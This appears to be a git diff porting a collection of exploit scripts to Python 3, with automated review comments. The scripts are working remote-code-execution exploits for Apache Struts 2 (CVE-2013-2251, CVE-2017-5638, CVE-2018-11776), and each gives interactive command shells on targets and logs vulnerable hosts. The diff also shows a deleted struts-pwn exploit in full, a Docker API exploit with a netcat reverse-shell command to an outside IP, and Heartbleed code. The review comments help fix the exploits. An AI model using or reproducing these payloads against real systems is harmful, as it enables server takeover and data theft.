diff --git a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
index fa95518..bda451a 100755
--- a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
+++ b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
@@ -1,13 +1,18 @@
 #!/usr/bin/python
-import urllib2
+from __future__ import print_function
+from future import standard_library
+standard_library.install_aliases()
+from builtins import input
+from builtins import str
+import urllib.request, urllib.error, urllib.parse
 import time
 import sys
 import os
-import commands
+import subprocess
 import requests
 import readline
-import urlparse
+import urllib.parse
 RED = '\033[1;31m'
 BLUE = '\033[94m'
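Review bot: The new import block brings in `urllib.parse` twice, once in `import urllib.request, urllib.error, urllib.parse` and again as `import urllib.parse` at the bottom, and it swaps `commands` for `subprocess` although nothing in the visible hunks calls either module. The second import can be dropped, and so can `subprocess` if it is unused. `from future import standard_library` and the `from builtins import ...` lines make the third-party `future` package a hard runtime requirement on Python 2, so it should be declared and pinned wherever this repository lists its dependencies (no such file is visible in this diff). The same `future`/`builtins` imports are added to the CVE-2017-9805, CVE-2018-11776 and Heartbleed scripts further down.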
@@ -21,190 +26,190 @@ def cls(): os.system(['clear', 'cls'][os.name == 'nt']) cls() -logo = BLUE+''' - ___ _____ ___ _ _ _____ ___ - ( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ +logo = BLUE+''' + ___ _____ ___ _ _ _____ ___ + ( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ | (_(_) | | | (_) )| | | | | | | (_(_) - `\__ \ | | | , / | | | | | | `\__ \ + `\__ \ | | | , / | | | | | | `\__ \ ( )_) | | | | |\ \ | (_) | | | ( )_) | - `\____) (_) (_) (_)(_____) (_) `\____) + `\____) (_) (_) (_)(_____) (_) `\____) =[ Command Execution v3]= - By @s1kr10s + By @s1kr10s '''+ENDC -print logo - -print " * Ejemplo: http(s)://www.victima.com/files.login\n" -host = raw_input(BOLD+" [+] HOST: "+ENDC) +print(logo) + +print(" * Ejemplo: http(s)://www.victima.com/files.login\n") +host = input(BOLD+" [+] HOST: "+ENDC) if len(host) > 0: - if host.find("https://") != -1 or host.find("http://") != -1: + if host.find("https://") != -1 or host.find("http://") != -1: - poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - - def exploit(comando): - exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploit + poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - def exploit2(comando): - exploit2 = 
"Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" - return exploit2 + def exploit(comando): + exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" + return exploit - def exploit3(comando): - exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" - return exploit3 + def 
exploit2(comando): + exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" + return exploit2 - def pwnd(shellfile): - exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploitfile + def exploit3(comando): + exploit3 = 
"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" + return exploit3 - def validador(): - arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] - return arr_lin_win + def pwnd(shellfile): + exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" + return exploitfile - #def reversepl(ip,port): - # print "perl" + def validador(): + arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] + return arr_lin_win - #def reversepy(ip,port): - # print "python" + #def reversepl(ip,port): + # print "perl" - # CVE-2013-2251 --------------------------------------------------------------------------------- - try: - response = '' - response = urllib2.urlopen(host+poc) - except: - print RED+" Servidor no responde\n"+ENDC - exit(0) + #def reversepy(ip,port): + # print "python" - print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC + # CVE-2013-2251 --------------------------------------------------------------------------------- + try: + response = '' + response = urllib.request.urlopen(host+poc) + except: + print(RED+" Servidor no 
responde\n"+ENDC) + exit(0) - if response.read().find("mamalo") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC) - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - #print BOLD+" * [SHELL REVERSA]"+ENDC - #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC - if opcion == 's': - print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) - print BOLD+" * [UPLOAD SHELL]"+ENDC - print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC + if response.read().find("mamalo") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + owned.write(str(host)+'\n') + owned.close() - while 1: - separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC) - espacio = separador.split(' ') - comando = "','".join(espacio) + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + #print BOLD+" * [SHELL REVERSA]"+ENDC + #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) + print(BOLD+" * [UPLOAD SHELL]"+ENDC) + print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) - if espacio[0] != 'reverse' and espacio[0] != 'pwnd': - shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'")) - print "\n"+shell.read() - elif espacio[0] == 'pwnd': - pathsave=raw_input("path EJ:/tmp/: ") + while 1: + separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC) + espacio = separador.split(' ') + comando = "','".join(espacio) - if espacio[1] == 'php': - shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("")'""" - urllib2.urlopen(host+pwnd(str(shellfile))) - shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) - if shell.read().find(pathsave+"status.php") != -1: - print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC - else: - print BOLD+RED+"\nNo Create File 
:/\n"+ENDC + if espacio[0] != 'reverse' and espacio[0] != 'pwnd': + shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'")) + print("\n"+shell.read()) + elif espacio[0] == 'pwnd': + pathsave=input("path EJ:/tmp/: ") - # CVE-2017-5638 --------------------------------------------------------------------------------- - print BLUE+" [-] NO VULNERABLE"+ENDC - print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC - x = 0 - while x < len(validador()): - valida = validador()[x] + if espacio[1] == 'php': + shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("")'""" + urllib.request.urlopen(host+pwnd(str(shellfile))) + shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) + if shell.read().find(pathsave+"status.php") != -1: + print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC) + else: + print(BOLD+RED+"\nNo Create File :/\n"+ENDC) - try: - req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) - result = urllib2.urlopen(req).read() + # CVE-2017-5638 --------------------------------------------------------------------------------- + print(BLUE+" [-] NO VULNERABLE"+ENDC) + print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC) + x = 0 + while x < len(validador()): + valida = validador()[x] - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + try: + req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) + result = urllib.request.urlopen(req).read() - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': 
- print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) + if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + owned.write(str(host)+'\n') + owned.close() - while 1: - try: - separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) - req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) - result = urllib2.urlopen(req).read() - print "\n"+result - except: - exit(0) - else: - x = len(validador()) - else: - print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) - except: - pass - x=x+1 + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) - # CVE-2018-11776 --------------------------------------------------------------------------------- - print BLUE+" [-] NO VULNERABLE"+ENDC - print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC - x = 0 - while x < len(validador()): - #Filtramos la url solo dominio - url = host.replace('#', '%23') - url = host.replace(' ', '%20') - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - site = scheme + '://' + urlparse.urlparse(url).netloc + while 1: + try: + separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) + req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) + result = urllib.request.urlopen(req).read() + print("\n"+result) + except: + exit(0) + else: + x = len(validador()) + else: + print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) + except: + pass + x=x+1 - #Filtramos la url solo path - file_path = urlparse.urlparse(url).path - if (file_path == ''): - 
file_path = '/' - - valida = validador()[x] - try: - result = requests.get(site+"/"+exploit3(str(valida))+file_path).text + # CVE-2018-11776 --------------------------------------------------------------------------------- + print(BLUE+" [-] NO VULNERABLE"+ENDC) + print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC) + x = 0 + while x < len(validador()): + #Filtramos la url solo dominio + url = host.replace('#', '%23') + url = host.replace(' ', '%20') + if ('://' not in url): + url = str("http://") + str(url) + scheme = urllib.parse.urlparse(url).scheme + site = scheme + '://' + urllib.parse.urlparse(url).netloc - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + #Filtramos la url solo path + file_path = urllib.parse.urlparse(url).path + if (file_path == ''): + file_path = '/' - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': - print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) - print BOLD+" * [UPLOAD SHELL]"+ENDC - print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC + valida = validador()[x] + try: + result = requests.get(site+"/"+exploit3(str(valida))+file_path).text - while 1: - separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC) - espacio = separador.split(' ') - comando = "%20".join(espacio) + if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + 
owned.write(str(host)+'\n') + owned.close() - shell = urllib2.urlopen(host+exploit3(str(comando))) - print "\n"+shell.read() - - else: - x = len(validador()) - exit(0) - else: - print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) - except: - pass - x=x+1 - else: - print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC - exit(0) + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) + print(BOLD+" * [UPLOAD SHELL]"+ENDC) + print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) + + while 1: + separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC) + espacio = separador.split(' ') + comando = "%20".join(espacio) + + shell = urllib.request.urlopen(host+exploit3(str(comando))) + print("\n"+shell.read()) + + else: + x = len(validador()) + exit(0) + else: + print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) + except: + pass + x=x+1 + else: + print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC) + exit(0) else: - print RED+" Debe Ingresar una Url\n"+ENDC - exit(0) + print(RED+" Debe Ingresar una Url\n"+ENDC) + exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-5638.py b/CVE Exploits/Apache Struts 2 CVE-2017-5638.py deleted file mode 100755 index df93d83..0000000 --- a/CVE Exploits/Apache Struts 2 CVE-2017-5638.py +++ /dev/null 
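Review bot: The bare `except: pass` around each probe in the CVE-2017-5638 and CVE-2018-11776 loops hides every failure, so a run that errors out cannot be told apart from a clean negative result. After this port that matters more: on Python 3 `urllib.request.urlopen(req).read()` returns bytes, `result.find("ASCII")` with a str argument raises TypeError, and the handler swallows it (the earlier `response.read().find("mamalo")` sits outside any `try` and would surface the same error). Decode once, e.g. `result = urllib.request.urlopen(req).read().decode('utf-8', 'replace')`, and narrow the handlers to `except (urllib.error.URLError, requests.RequestException):` so that real errors are reported. The bare handler also catches the SystemExit raised by the inner `exit(0)`.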
@@ -1,176 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2017-5638 Exploit -# Author: -# Mazin Ahmed -# This code is based on: -# https://www.exploit-db.com/exploits/41570/ -# https://www.seebug.org/vuldb/ssvid-92746 -# ***************************************************** -import sys -import random -import requests -import argparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: id)", - action='store', - default='id') -parser.add_argument("--check", - dest="do_check", - help="Check if a target is vulnerable.", - action='store_true') -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -url = args.url if args.url else None -cmd = args.cmd if args.cmd else None -do_check = args.do_check if args.do_check else None - - -def url_prepare(url): - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - if ('://' not in url): - url = str('http') + str('://') + str(url) - return(url) - - -def exploit(url, cmd): - url = url_prepare(url) - print('\n[*] URL: %s' % (url)) - print('[*] CMD: %s' % (cmd)) - - payload = "%{(#_='multipart/form-data')." - payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." - payload += "(#_memberAccess?" 
- payload += "(#_memberAccess=#dm):" - payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." - payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." - payload += "(#ognlUtil.getExcludedPackageNames().clear())." - payload += "(#ognlUtil.getExcludedClasses().clear())." - payload += "(#context.setMemberAccess(#dm))))." - payload += "(#cmd='%s')." % cmd - payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." - payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." - payload += "(#p=new java.lang.ProcessBuilder(#cmds))." - payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." - payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." - payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." - payload += "(#ros.flush())}" - - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Content-Type': str(payload), - 'Accept': '*/*' - } - - timeout = 3 - try: - output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - output = 'ERROR' - return(output) - - -def check(url): - url = url_prepare(url) - print('\n[*] URL: %s' % (url)) - - random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7)) - - payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']." 
- payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string) - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Content-Type': str(payload), - 'Accept': '*/*' - } - - timeout = 3 - try: - resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)): - result = True - else: - result = False - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - result = False - return(result) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check): - if url: - if do_check: - result = check(url) # Only check for existence of Vulnerablity - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - else: - output = exploit(url, cmd) # Exploit - print(output) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), 'r') - URLs_List = f_file.read().replace('\r', '').split('\n') - try: - URLs_List.remove('') - except ValueError: - pass - f_file.close() - except: - print('Error: There was an error in reading list file.') - exit(1) - for url in URLs_List: - if do_check: - result = check(url) # Only check for existence of Vulnerablity - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - else: - output = exploit(url, cmd) # Exploit - print(output) - - print('[%] Done.') - -if __name__ == '__main__': - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check) - except KeyboardInterrupt: - print('\nKeyboardInterrupt Detected.') - print('Exiting...') - exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py index 9cd6cce..4eb64f5 100755 
--- a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py
+++ b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py
@@ -8,6 +8,8 @@
 # https://github.com/rapid7/metasploit-framework/pull/8924
 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
 # *****************************************************
+from __future__ import print_function
+from builtins import str
 import argparse
 import requests
 import sys
diff --git a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py
index edbf3c5..7fb1174 100755
--- a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py
+++ b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py
@@ -8,6 +8,11 @@
 # https://github.com/jas502n/St2-057
 # *****************************************************
+from __future__ import print_function
+from future import standard_library
+standard_library.install_aliases()
+from builtins import str
+from builtins import range
 import argparse
 import random
 import requests
@@ -15,7 +20,7 @@ import sys
 try:
 from urllib import parse as urlparse
 except ImportError:
- import urlparse
+ import urllib.parse
 # Disable SSL warnings
 try:
@@ -77,13 +82,13 @@ def parse_url(url):
 if ('://' not in url):
 url = str("http://") + str(url)
- scheme = urlparse.urlparse(url).scheme
+ scheme = urllib.parse.urlparse(url).scheme
 # Site: http://example.com
- site = scheme + '://' + urlparse.urlparse(url).netloc
+ site = scheme + '://' + urllib.parse.urlparse(url).netloc
 # FilePath: /demo/struts2-showcase/index.action
- file_path = urlparse.urlparse(url).path
+ file_path = urllib.parse.urlparse(url).path
 if (file_path == ''):
 file_path = '/'
@@ -154,7 +159,7 @@ def check(url):
 except Exception as e:
 print("EXCEPTION::::--> " + str(e))
 continue
- if "Location" in list(resp.headers.keys()):
+ if "Location" in list(resp.headers.keys()):
 if str(multiplication_value) in resp.headers['Location']:
 print("[*] Status: Vulnerable!")
 return(injection_point)
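Review bot: In the CVE-2018-11776 script the `try` branch `from urllib import parse as urlparse` succeeds on Python 3 and binds only the name `urlparse`, yet the rewritten calls in `parse_url` (next hunk) use `urllib.parse.urlparse(url)`. Unless `urllib` is imported elsewhere in the file, which these hunks do not show, that name is unbound on that path and the call raises NameError. The `except ImportError: import urllib.parse` fallback only runs when the first import fails. Either keep the original `urlparse.urlparse(...)` calls, or replace the whole try/except with a single `import urllib.parse`, which the `standard_library.install_aliases()` call added above is meant to make importable on Python 2 as well. `parse_url` continues outside the hunk.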
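Review bot: Wrapping `resp.headers.keys()` in `list()` in `check` is unnecessary and turns the membership test into an exact-case string comparison. `if "Location" in resp.headers:` is shorter and uses the case-insensitive lookup that the requests header mapping provides, so a response carrying a lowercase `location` header is not silently read as a negative result. The body of `check` starts outside this hunk.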
diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py
index 1f8cea9..8880a16 100644
--- a/CVE Exploits/Docker API RCE.py
+++ b/CVE Exploits/Docker API RCE.py
@@ -1,3 +1,4 @@
+from __future__ import print_function
 import requests
 import logging
 import json
@@ -23,7 +24,7 @@ if r.json:
 for container in r.json():
 container_id = container['Id']
 container_name = container['Names'][0].replace('/','')
- print(container_id, container_name)
+ print((container_id, container_name))
 # Step 2 - Prepare command
 cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
diff --git a/CVE Exploits/Heartbleed CVE-2014-0160.py b/CVE Exploits/Heartbleed CVE-2014-0160.py
index 60672a3..42907c1 100755
--- a/CVE Exploits/Heartbleed CVE-2014-0160.py
+++ b/CVE Exploits/Heartbleed CVE-2014-0160.py
@@ -4,6 +4,9 @@
 # The author disclaims copyright to this source code.
 # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
+from __future__ import print_function
+from builtins import str
+from builtins import range
 import sys
 import struct
 import socket
@@ -61,12 +64,12 @@ def hexdump(s, dumpf, quiet):
 dump.write(s)
 dump.close()
 if quiet: return
- for b in xrange(0, len(s), 16):
+ for b in range(0, len(s), 16):
 lin = [c for c in s[b : b + 16]]
 hxdat = ' '.join('%02X' % ord(c) for c in lin)
 pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
- print ' %04x: %-48s %s' % (b, hxdat, pdat)
- print
+ print(' %04x: %-48s %s' % (b, hxdat, pdat))
+ print()
 def recvall(s, length, timeout=5):
 endtime = time.time() + timeout
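Review bot: `print((container_id, container_name))` in the Docker script prints the tuple's repr (quotes, comma and parentheses) on both interpreters. Because the first hunk of this file adds `from __future__ import print_function`, the original `print(container_id, container_name)` already behaves as a function call and prints the two values separated by a space. Keep the single-parenthesis form unless the tuple output is what is wanted.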
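Review bot: `hexdump` in the Heartbleed checker still calls `ord(c)` on each element of `s[b : b + 16]`, which only works while `s` is a Python 2 byte string. If `s` is the bytes object a Python 3 socket returns (the caller is outside this hunk), iterating yields ints and `ord()` raises TypeError, so the checker stops before it reports a result. Iterating over `bytearray(s[b : b + 16])` and formatting with `'%02X' % c` and `chr(c)` behaves the same on both versions. The unchanged context lines `ord(pay[0]) == 0x0E` in `parseresp` and `s.send('starttls\r\n')` in `check`, in the later hunks of this file, carry the same str/bytes assumption.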
